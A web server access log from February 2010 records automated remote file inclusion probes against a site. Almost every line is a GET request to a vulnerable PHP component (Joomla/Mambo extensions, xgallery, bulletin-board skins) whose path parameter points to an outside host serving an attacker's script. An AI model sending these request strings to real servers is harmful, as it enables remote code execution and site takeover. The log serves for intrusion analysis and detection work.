61.63.82.14 - - [21/Feb/2010:10:51:29 -0800] "GET /logs/index.php?conteudo=http://www.parisplayground.com/paris/soirees/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.puaga.com"
61.63.82.14 - - [21/Feb/2010:10:51:29 -0800] "GET /logs/access_100120.log/index.php?conteudo=http://www.parisplayground.com/paris/soirees/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.puaga.com"
61.63.82.14 - - [21/Feb/2010:10:51:29 -0800] "GET /index.php?conteudo=http://www.parisplayground.com/paris/soirees/id.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.puaga.com"
213.251.189.203 - - [21/Feb/2010:10:51:33 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.203 - - [21/Feb/2010:10:51:33 -0800] "GET /logs/access_100205.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.203 - - [21/Feb/2010:10:51:33 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:10:51:38 -0800] "GET /logs/access_100124.log%20%20////administrator/components/com_chronocontact/delete_all.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [21/Feb/2010:10:51:48 -0800] "GET /logs/index.php?conteudo=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.puaga.com"
61.63.82.14 - - [21/Feb/2010:10:51:48 -0800] "GET /logs/access_100203.log/index.php?conteudo=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.puaga.com"
61.63.82.14 - - [21/Feb/2010:10:51:48 -0800] "GET /index.php?conteudo=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.puaga.com"
61.63.82.14 - - [21/Feb/2010:10:51:48 -0800] "GET /logs/access_100120.log/index.php?conteudo=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.puaga.com"
61.97.159.28 - - [21/Feb/2010:10:52:09 -0800] "GET /logs/access_100210.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [21/Feb/2010:10:52:11 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [21/Feb/2010:10:52:11 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [21/Feb/2010:10:52:11 -0800] "GET /logs/access_100120.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [21/Feb/2010:10:52:25 -0800] "GET /logs/access_100210.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [21/Feb/2010:10:52:29 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [21/Feb/2010:10:52:29 -0800] "GET /logs/access_100120.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [21/Feb/2010:10:52:29 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [21/Feb/2010:10:52:44 -0800] "GET /logs/access_100116.log//sources/template.php?CONFIG[main_path]=http://phppod.com//administrator/components/aadc/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [21/Feb/2010:10:52:49 -0800] "GET /logs/access_100210.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [21/Feb/2010:10:52:54 -0800] "GET /logs/access_100121.log//sources/template.php?CONFIG[main_path]=http://phppod.com//administrator/components/aadc/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.97.159.28 - - [21/Feb/2010:10:53:00 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.97.159.28 - - [21/Feb/2010:10:53:00 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.97.159.28 - - [21/Feb/2010:10:53:03 -0800] "GET /logs/access_100120.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.97.159.28 - - [21/Feb/2010:10:53:03 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.97.159.28 - - [21/Feb/2010:10:53:07 -0800] "GET /logs/access_100120.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.97.159.28 - - [21/Feb/2010:10:53:09 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.97.159.28 - - [21/Feb/2010:10:53:57 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.97.159.28 - - [21/Feb/2010:10:53:57 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.97.159.28 - - [21/Feb/2010:10:53:59 -0800] "GET /logs/access_100208.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.3.132.185 - - [21/Feb/2010:10:57:45 -0800] "GET /logs/access_100204.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.3.132.185 - - [21/Feb/2010:10:57:45 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.3.132.185 - - [21/Feb/2010:10:57:45 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:10:58:24 -0800] "GET /logs/access_100204.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:10:58:24 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:10:58:24 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.97.159.28 - - [21/Feb/2010:10:58:32 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.97.159.28 - - [21/Feb/2010:10:58:32 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.97.159.28 - - [21/Feb/2010:10:58:33 -0800] "GET /logs/access_100120.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.250.255.242 - - [21/Feb/2010:10:59:25 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.puaga.com"
64.15.152.132 - - [21/Feb/2010:11:01:52 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [21/Feb/2010:11:01:52 -0800] "GET /logs/access_100127.log%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [21/Feb/2010:11:01:53 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.3.132.185 - - [21/Feb/2010:11:02:35 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.3.132.185 - - [21/Feb/2010:11:02:40 -0800] "GET /logs/access_100127.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.3.132.185 - - [21/Feb/2010:11:02:40 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [21/Feb/2010:11:02:44 -0800] "GET /logs////components/com_forum/forum.php?mosConfig_absolute_path=http://www.altem.be/mambots/ts?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.puaga.com"
213.239.230.130 - - [21/Feb/2010:11:02:44 -0800] "GET ///components/com_forum/forum.php?mosConfig_absolute_path=http://www.altem.be/mambots/ts?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.puaga.com"
64.15.152.132 - - [21/Feb/2010:11:04:09 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [21/Feb/2010:11:04:14 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [21/Feb/2010:11:04:19 -0800] "GET /logs/access_100127.log%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.94.65.18 - - [21/Feb/2010:11:04:19 -0800] "GET /logs/access_100208.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.acrobarium.com.mx/encuesta/tete.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:11:04:57 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:11:04:57 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:11:04:57 -0800] "GET /logs/access_100127.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [21/Feb/2010:11:05:20 -0800] "GET /logs/access_100206.log%20%20//bbs///////write_update?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [21/Feb/2010:11:05:20 -0800] "GET /logs//bbs///////write_update?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [21/Feb/2010:11:05:20 -0800] "GET /bbs///////write_update?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [21/Feb/2010:11:05:22 -0800] "GET /http://keycarsales.com/css/templates/target.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
64.15.152.132 - - [21/Feb/2010:11:05:28 -0800] "GET /logs/access_100111.log%20%20///index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [21/Feb/2010:11:05:28 -0800] "GET /logs///index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [21/Feb/2010:11:05:32 -0800] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:11:05:48 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:11:05:48 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:11:05:48 -0800] "GET /logs/access_100204.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [21/Feb/2010:11:06:07 -0800] "GET /logs///index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [21/Feb/2010:11:06:07 -0800] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [21/Feb/2010:11:06:15 -0800] "GET /logs/access_100111.log%20%20///index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [21/Feb/2010:11:06:58 -0800] "GET //bbs///skin/buzzard_espoon/reply.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [21/Feb/2010:11:06:58 -0800] "GET /logs/access_100201.log///bbs///skin/buzzard_espoon/reply.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [21/Feb/2010:11:06:58 -0800] "GET /logs///bbs///skin/buzzard_espoon/reply.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:11:07:18 -0800] "GET /logs/access_100118.log////bbs/delete.php?board_skin_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:11:07:18 -0800] "GET ///bbs/delete.php?board_skin_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:11:07:18 -0800] "GET /logs////bbs/delete.php?board_skin_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:11:07:19 -0800] "GET /logs/view_body/skin_shop//news.php?id=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:11:07:19 -0800] "GET /logs/access_100115.log%20%20/view_body/skin_shop//news.php?id=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:11:07:20 -0800] "GET /view_body/skin_shop//news.php?id=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:11:07:21 -0800] "GET /logs/access_100203.log%20%20///index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:11:07:21 -0800] "GET /logs///index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:11:07:22 -0800] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:11:07:22 -0800] "GET /view_body/skin_shop//news.php?id=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:11:07:22 -0800] "GET /logs/view_body/skin_shop//news.php?id=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:11:07:24 -0800] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:11:07:26 -0800] "GET /logs///index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:11:07:26 -0800] "GET /logs/access_100115.log%20%20/view_body/skin_shop//news.php?id=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:11:07:26 -0800] "GET /logs/access_100203.log///index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:11:07:40 -0800] "GET /logs/access_100203.log%20%20///index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:11:07:40 -0800] "GET /logs///index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:11:07:40 -0800] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
72.3.132.185 - - [21/Feb/2010:11:07:48 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.3.132.185 - - [21/Feb/2010:11:07:48 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.3.132.185 - - [21/Feb/2010:11:07:48 -0800] "GET /logs/access_100204.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [21/Feb/2010:11:07:51 -0800] "GET /logs///index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [21/Feb/2010:11:07:51 -0800] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.0" 200 3626 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [21/Feb/2010:11:07:51 -0800] "GET /logs/access_100111.log///index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [21/Feb/2010:11:07:59 -0800] "GET /logs///index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [21/Feb/2010:11:08:00 -0800] "GET /logs/access_100111.log///index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [21/Feb/2010:11:08:00 -0800] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [21/Feb/2010:11:08:11 -0800] "GET //bbs///skin/buzzard_espoon/reply.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [21/Feb/2010:11:08:11 -0800] "GET /logs/access_100201.log///bbs///skin/buzzard_espoon/reply.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [21/Feb/2010:11:08:11 -0800] "GET /logs///bbs///skin/buzzard_espoon/reply.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:11:08:25 -0800] "GET /logs/access_100118.log%20%20///index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:11:08:39 -0800] "GET /logs/access_100118.log%20%20///index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.117.70.36 - - [21/Feb/2010:11:08:46 -0800] "GET /logs/access_100119.log//?_SERVER[DOCUMENT_ROOT]=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mo